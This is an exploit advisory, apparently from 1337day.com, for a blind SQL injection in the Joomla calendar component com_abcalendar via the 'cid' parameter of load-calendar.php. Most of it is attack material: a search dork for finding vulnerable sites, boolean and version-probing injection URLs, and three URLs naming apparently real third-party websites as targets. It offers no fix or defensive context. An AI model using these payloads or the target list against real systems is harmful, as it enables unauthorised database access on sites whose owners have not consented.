Joomla Component com_abcalendar Blind Injection Vulnerability

                     Joomla Component com_abcalendar Blind Injection Vulnerability

Joomla Component com_abcalendar Blind Injection Vulnerability
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Dork           : inurl:"com_abcalendar"
####################################################################
===[ Exploit ]===

Sql Injection:
==============

www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3[Blind]

www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and 1=1 >> True
www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and 1=2 >> False

www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and substring(@@version,1,1)=5 >> True
www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and substring(@@version,1,1)=4 >> False
####################################################################

http://www.puntamika.hr/portal/administrator/components/com_abcalendar/load-calendar.php?view=6&month=1&year=3190&cid=1'

www.christchurchapartments.co.uk/~christap/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2191&cid=3'

http://www.accommodationlagos.com/~accommod/administrator/components/com_abcalendar/load-calendar.php?view=3&month=8&year=5272&cid=3'

# 59AD181B5262131E   1337day.com [2013-06-15]   873D02B2BAFD9988 #